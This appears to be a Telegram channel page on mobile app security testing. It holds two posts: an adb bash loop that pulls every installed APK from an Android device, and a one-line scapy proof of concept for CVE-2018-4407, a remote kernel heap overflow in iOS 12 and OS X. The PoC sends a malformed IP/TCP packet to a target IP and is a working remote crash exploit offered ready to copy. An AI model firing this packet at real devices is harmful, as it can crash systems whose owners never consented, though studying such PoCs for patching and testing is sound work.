Mobile Apps Security Testing
2.01K subscribers
9 files
428 links
Download Telegram
#HackingAndroid; bash script to pull all packages; for i in adb shell pm list packages | sed 's/package://g';do echo $i >> packages.txt; for path in adb shell pm path $i | sed 's/package://g';do echo $path >> packages-path.txt;adb pull $path;done;done
iOS 12 / OS X *Remote Kernel Heap Overflow (CVE-2018-4407) POC* in a tweet:
pip install scapy
sudo scapy
send(IP(dst=“Target IP“,options=[IPOption(“A”*8)])/TCP(dport=2323,options=[(19, “1"*18),(19, “2”*18)]))